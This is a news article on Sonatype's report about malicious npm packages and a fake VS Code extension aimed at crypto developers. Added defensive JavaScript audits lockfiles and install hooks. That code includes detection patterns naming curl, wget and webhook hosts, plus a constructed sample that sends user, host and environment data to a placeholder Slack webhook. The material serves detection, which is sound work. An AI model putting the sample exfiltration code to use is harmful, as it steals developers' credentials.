
Malware inside the code: Crypto apps at risk

Fake and hijacked open-source tools are putting developers – and user funds – in danger

By Bo Jablonski, Apr. 3rd, 4pm
Malicious packages look like trusted tools but secretly steal data from crypto developers. Photo: Unsplash / Firosnv. Photography

Cybersecurity firm Sonatype uncovered nearly 18,000 malicious open-source software packages in the first three months of 2025, with many designed to steal sensitive data or hijack systems – and a growing number aimed at cryptocurrency developers.

The figure, released in Sonatype's latest quarterly malware report, is a significant drop from the roughly 34,000 packages detected in the previous quarter (Q4 2024). But researchers warn that while the total is lower, the malware is getting more sophisticated and more dangerous.

Over half of the malicious packages detected in Q1 were built for data exfiltration, up from 26% in the previous quarter. This type of malware is designed to steal passwords, access keys and tokens, and other sensitive information from infected machines.

Malware for crypto mining, which secretly uses victims’ devices to generate digital currency, also doubled from 3.5% to 7%.

Repackaged crypto tools quietly steal credentials

One of the most alarming findings involved npm packages used in crypto and blockchain development. Attackers took control of legitimate, trusted packages and published new versions of them carrying hidden malware.

The packages still worked as expected, which helped them avoid detection. But they quietly collected data from every machine they were installed on, including user profiles, system details and environment variables, which in a developer's shell often hold API keys, tokens and other credentials. Sonatype believes a single threat actor was behind the attack, though no group was named.
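A check for the hijacked-package scenario above, as an added example that is not from the article or from Sonatype: it audits an npm package-lock.json so that every dependency is pinned to a tarball from the expected registry with a sha512 integrity hash, and flags floating semver ranges in package.json that would let a newly published (possibly trojanized) version be pulled in on a fresh install. The lockfile, manifest, registry URL, package names and placeholder digest are all constructed for the example.

```javascript
// Added example, written for this page (not Sonatype's tooling): audit an
// npm package-lock.json (lockfileVersion 3 layout) so every dependency is
// pinned to a tarball on the expected registry with a sha512 integrity hash.
const ALLOWED_REGISTRY = "https://registry.npmjs.org/"; // assumed registry

function auditLockfile(lock, allowedRegistry = ALLOWED_REGISTRY) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "") continue;   // root project entry, no tarball
    if (entry.link) continue;    // workspace symlink, no tarball
    const name = path.replace(/^.*node_modules\//, "");
    if (!entry.resolved) {
      findings.push({ name, issue: "missing resolved URL" });
    } else if (!entry.resolved.startsWith(allowedRegistry)) {
      findings.push({ name, issue: `resolved outside registry: ${entry.resolved}` });
    }
    // npm writes sha512 SRI hashes; an absent or non-sha512 value means the
    // tarball is not bound to a digest anyone reviewed.
    if (!entry.integrity) {
      findings.push({ name, issue: "missing integrity hash" });
    } else if (!/^sha512-[A-Za-z0-9+/]+={0,2}$/.test(entry.integrity)) {
      findings.push({ name, issue: `weak or malformed integrity: ${entry.integrity}` });
    }
  }
  return findings;
}

// A range such as ^2.0.0 lets any newly published 2.x, including a
// trojanized one, satisfy the dependency when no lockfile is honoured.
function floatingRanges(manifest) {
  const out = [];
  for (const field of ["dependencies", "devDependencies"]) {
    for (const [name, range] of Object.entries(manifest[field] || {})) {
      if (!/^\d+\.\d+\.\d+$/.test(range)) out.push({ name, field, range });
    }
  }
  return out;
}

// Constructed inputs: one pinned, registry-sourced dependency and one
// floating dependency whose lock entry came from elsewhere without a hash.
const sampleManifest = {
  name: "wallet-tool",
  dependencies: { "left-pad-ish": "1.3.0", "mystery-sdk": "^2.0.0" },
};
const sampleLock = {
  name: "wallet-tool",
  lockfileVersion: 3,
  packages: {
    "": { name: "wallet-tool", dependencies: sampleManifest.dependencies },
    "node_modules/left-pad-ish": {
      version: "1.3.0",
      resolved: "https://registry.npmjs.org/left-pad-ish/-/left-pad-ish-1.3.0.tgz",
      integrity: "sha512-" + "A".repeat(86) + "==", // placeholder digest, not a real hash
    },
    "node_modules/mystery-sdk": {
      version: "2.0.1",
      resolved: "http://mirror.example.net/mystery-sdk-2.0.1.tgz",
    },
  },
};

console.log(auditLockfile(sampleLock));   // two findings, both for mystery-sdk
console.log(floatingRanges(sampleManifest)); // mystery-sdk ^2.0.0
```

Run it against the real files with auditLockfile(JSON.parse(fs.readFileSync("package-lock.json", "utf8"))). In CI, install with npm ci rather than npm install: it refuses to proceed when package.json and the lockfile disagree, so a republished version cannot slip in through a range until someone deliberately updates the lock.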

Another case involved a fake Visual Studio Code extension, disguised as a useful developer tool but bundling a modified remote access tool (RAT). Once installed, it gave attackers full control of the machine, letting them monitor the screen and steal files without the user's knowledge.

Fake Solana tools act like spyware

A third campaign specifically targeted Solana developers. Malicious npm packages claiming to support Solana were downloaded nearly 2,000 times. Once installed, they ran scripts that logged keystrokes, captured screenshots, and exfiltrated the data to the attackers via Slack and the ImgBB image-hosting service.

In this case, the malicious code was not obfuscated, which suggests the attackers did not expect anyone to look at it.

The report noted that this type of malware often runs as soon as a package is installed or first loaded, before the developer has run or reviewed any of its code, which lets it bypass many traditional security tools. For npm packages that typically means lifecycle scripts such as preinstall and postinstall, which npm executes automatically during npm install. Sonatype recommends real-time malware detection during development and increased scrutiny of open-source packages, especially in financial or crypto-related projects.
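The install-time execution described above, as an added example that is not part of the article or of Sonatype's tooling: a static audit of a package's npm lifecycle hooks, plus a heuristic for the read-secrets-then-send-out pattern the Solana and repackaged-tool campaigns share. The manifests, source snippets, package names and indicator list are constructed; the Slack and ImgBB hostnames are assumed endpoints used purely as indicators, not taken from the report.

```javascript
// Added example, written for this page (not Sonatype's product): flag what
// an npm package will execute at install time, and triage install-time
// source for the "collect host/user/env data, then send it out" pattern.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Strings in a hook command that warrant a manual look. The two hostnames
// are assumed Slack webhook / ImgBB upload endpoints, used as indicators only.
const HOOK_INDICATORS = [
  /\bnode\s+-e\b/, /\bcurl\b/, /\bwget\b/, /powershell/i, /base64/i,
  /hooks\.slack\.com/, /api\.imgbb\.com/,
];

function auditInstallHooks(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (cmd === undefined) continue;
    // Every lifecycle hook runs automatically on `npm install`, so each one
    // is recorded even when no indicator matches.
    const indicators = HOOK_INDICATORS.filter((re) => re.test(cmd)).map(String);
    // A hook that runs a file shipped in the package (e.g. `node install.js`)
    // means the package's own code executes before anything imports it.
    const runsLocalFile = /\bnode\s+[\w./-]+\.js\b/.test(cmd);
    findings.push({ hook, cmd, indicators, runsLocalFile });
  }
  return findings;
}

// Heuristic for the data-theft shape the report describes: the same file
// both reads user/system/environment details and makes an outbound call.
const READS_SENSITIVE = [
  /process\.env\b/, /os\.userInfo\(/, /os\.hostname\(/, /os\.networkInterfaces\(/, /\.ssh\b/,
];
const SENDS_NETWORK = [
  /https?\.request\(/, /\bfetch\(/, /axios\.(post|put|request)\(/, /net\.connect\(/,
];

function flagsExfiltration(source) {
  const reads = READS_SENSITIVE.filter((re) => re.test(source)).map(String);
  const sends = SENDS_NETWORK.filter((re) => re.test(source)).map(String);
  return { reads, sends, suspicious: reads.length > 0 && sends.length > 0 };
}

// Constructed manifests: a clean build, and the same package with a
// postinstall hook that runs a bundled script.
const benignManifest = { name: "solana-helper", scripts: { build: "tsc -p .", test: "jest" } };
const trojanizedManifest = {
  name: "solana-helper",
  scripts: { build: "tsc -p .", postinstall: "node scripts/setup.js" },
};

// Constructed install-time source in the shape the report describes:
// gather user, host and environment data, then post it to a webhook.
const suspiciousSource = `
const os = require("os");
const payload = { user: os.userInfo(), host: os.hostname(), env: process.env };
fetch("https://hooks.slack.com/services/EXAMPLE", { method: "POST", body: JSON.stringify(payload) });
`;
const cleanSource = `const os = require("os"); module.exports = () => os.cpus().length;`;

console.log(auditInstallHooks(benignManifest));      // []
console.log(auditInstallHooks(trojanizedManifest));  // postinstall, runsLocalFile: true
console.log(flagsExfiltration(suspiciousSource).suspicious); // true
```

The cheapest mitigation is to not let hooks run at all: install with npm ci --ignore-scripts (or set ignore-scripts=true in .npmrc) and invoke any build step a dependency genuinely needs explicitly. The exfiltration heuristic is a triage aid, not a verdict; a legitimate telemetry or crash-reporting module matches it too, which is why the output points to the file rather than blocking on its own.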

Since 2019, the company says its Repository Firewall has blocked more than 100,000 malicious packages before they reached development environments.

As attackers shift their focus from users and platforms to the tools developers rely on, the risk is no longer just bad code — it’s trusted code doing harmful things.
